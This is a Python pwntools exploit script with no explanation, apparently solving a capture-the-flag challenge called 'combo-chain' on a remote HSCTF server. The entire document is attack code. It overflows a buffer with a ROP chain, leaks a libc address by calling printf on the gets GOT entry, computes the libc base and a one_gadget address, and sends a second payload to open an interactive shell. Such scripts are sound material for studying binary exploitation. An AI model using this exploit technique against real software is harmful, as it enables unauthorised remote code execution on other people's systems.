1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| from pwn import *
r = remote('pwn.hsctf.com', 2345) e = ELF('./combo-chain') libc = e.libc
ru = lambda a: r.recvuntil(a) sl = lambda a: r.sendline(a) sa = lambda a, b: r.sendafter(a, b) sla = lambda a, b: r.sendlineafter(a, b) ex = lambda : r.interactive()
gets_offset = libc.symbols['gets'] gets_got = e.got['gets'] printf_plt = e.plt['printf'] main = e.symbols['main'] pr = 0x0000000000401263 nop = 0x000000000040114f one_gadget = 0x4526a
p = "" p += "\x90"*16 p += p64(pr) p += p64(gets_got) p += p64(nop) p += p64(printf_plt) p += p64(main) sla(": ", p)
leaked = u64(r.recv(6).ljust(8, "\x00")) print hex(leaked) libc_base = leaked - gets_offset one_shot = libc_base + one_gadget
p = "" p += "\x90"*16 p += p64(one_shot) sla(": ", p) ex()
|